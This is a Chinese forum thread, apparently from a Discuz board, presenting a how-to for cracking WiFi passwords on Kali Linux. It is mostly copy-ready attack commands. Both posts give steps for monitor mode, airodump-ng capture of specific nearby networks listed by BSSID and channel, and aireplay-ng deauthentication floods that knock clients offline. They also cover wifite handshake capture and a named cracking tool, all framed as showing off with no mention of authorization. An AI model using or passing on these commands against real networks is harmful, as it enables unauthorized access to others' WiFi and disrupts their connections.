查看: 171|回复: 1

用Kali破解WiFi密码!小方法装个大B!

[复制链接]

345

主题

53

回帖

4053

积分

超级版主

积分
4053
发表于 2025-2-8 13:11:26 | 显示全部楼层 |阅读模式
本帖最后由 泥泞有痕 于 2025-2-9 11:21 编辑

【用Kali破解WiFi密码!小方法装个大B!】 https://www.bilibili.com/video/B ... 6a90c636c0f2f67525a


*******************************************************************************************************
开始前结束干扰进程:  airmon-ng check kill
第一步:airmon-ng start wlan0                /**  网卡开启监听**/
第二步:airodump-ng wlan0               /**  监听周围无线**/
第三步:airodump-ng --bssid 04:F9:F8:6E:49:20 -c 6 -w /home/kali/Desktop/kaliwifi/TP-LINK_4920-wifi  wlan0
第三步:airodump-ng --bssid  F0:90:08:EB:C5:B2 -c 4 -w /home/kali/Desktop/kaliwifi/210-wifi  wlan0
第三步:airodump-ng --bssid 42:39:B5:2C:21:A0 -c 6 -w /home/kali/Desktop/kaliwifi/204-wifi  wlan0
第四步:新开窗口:aireplay-ng -0 20 -c FC:19:99:47:F7:F5 -a 04:F9:F8:6E:49:20 wlan0                        /**  20是攻击次数  -0表示无限次**/
第四步:新开窗口:aireplay-ng -0 20 -c MAC -a F0:90:08:EB:C5:B2 wlan0                        /**  -a后跟路由器MAC **/
第四步:新开窗口:aireplay-ng -0 20 -c MAC -a 42:39:B5:2C:21:A0 wlan0                /**  -c后跟设备MAC **/
抓包成功会提示: WPA handshake:MAC地址


跑包软件:wifipr                Wireless Password Recovery-capture-qq.wifipr


42:39:B5:2C:21:A0    204                                ch6
04:F9:F8:6E:49:20    TP-LINK_4920                ch6


用户名密码: kali/kali
提升权限  sudo su
查看网卡 airmon-ng
结束干扰进程:airmon-ng check kill
网卡开启监听: airmon-ng start wlan0
监听周围无线: airodump-ng wlan0
开启监听 wifite--skip-crack
迫使设备掉线 aireplay-ng -a MAC -0 6 wlan0

345

主题

53

回帖

4053

积分

超级版主

积分
4053
 楼主| 发表于 2025-2-8 13:20:24 | 显示全部楼层


kali系统获取handshake的方法(4way-EAPOL-key) - 知乎

kali系统获取handshake的方法(4way-EAPOL-key)

kali下抓握手包不建议直接用aircrack-ng,目的只是抓个握手包,不是为了抓取所有数据,使用aircrack-ng的话过于繁琐,对于新手极不友好。对于只想抓取握手包的同学来说,建议用wifite
下面是方法:
1、执行下面的命令把网卡的monitor模式打开。sudo    ip    link    set      wlan0    downsudo    iw    dev     wlan0    set      type    monitorsudo    ip    link    set      wlan0    upsudo    airmon-ng     check    kill
2、执行下面的命令启动wifitesudo     wifite   --skip-crack其中 --no-wps选项跳过wps攻击, --no-pmkid跳过pmkid攻击,--skip-crack跳过用wifite跑包,-5的话是监听5G频段
如果目标带漫游功能的话,使用附录中的方法安装hcxdumptool和hcxpcapngtool。(目前大部分是很少有路由器会有RSN中含PMKID,这部分可以不用理会,如果你是漫游相关的网络,去文章最后面附录那里看解决方法。)
3、wifite会扫描出附近的网络,当出现自己想要破解的ap时,按ctrl +C结束监听(比如下面第3个名为TP-LINK_463A为目标AP,当它出现以后我就可以按ctrl + C结束监听了)。4、然后输入目标AP的编号,告诉wifite你要破解的路由器是哪个,我这里目标AP的编号是3,所以我输入3回车。可以输入3,4,5代表同时选择这三个,也可以输入4-13,代表选择4到13。也可以输入all,代表选择全部。5、然后就是等待!等待!等待!一两个小时吧。程序执行完后会有结果提示信息,如下图所示6、上图显示抓到了握手包,并把握手包放到了当目前目录中的hs文件夹下(当前目录一般就是你打开shell的目录,默认是/home/kali目录,或者输入pwd命令看一下当前目录是什么),名字为上图所示。接下来软件会自动尝试跑包,不用管它,直接ctrl+c结束掉软件运行,去hs文件夹下把握手包考走即可。

附录:hcxtools等缺少依赖的解决方法
1、先重启虚拟机,确认系统已经联网。(ping http://baidu.com能通即可)
2、确认/etc/apt/sources.list文件中有可用的源(cat /etc/apt/sources.list)。最好用下面的官方源或者科大源。
添加源的方法:使用下面的命令打开配置文件sudo  mousepad   /etc/apt/sources.list然后在打开的文件中把原来的内容清空,把下面4行软件源粘贴到文件保存即可#deb      http://http.kali.org/kali kali-rolling main non-free contrib#deb-src  http://http.kali.org/kali kali-rolling main non-free contribdeb      https://mirrors.ustc.edu.cn/kali kali-rolling main non-free contribdeb-src  https://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
3、执行下面的命令刷新软件源缓存
sudo  apt   update
4、执行下面的命令安装依赖hcxdumptool hcxtools
sudo  apt    install    hcxdumptool   hcxtools
5、继续上文中的抓包步骤

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表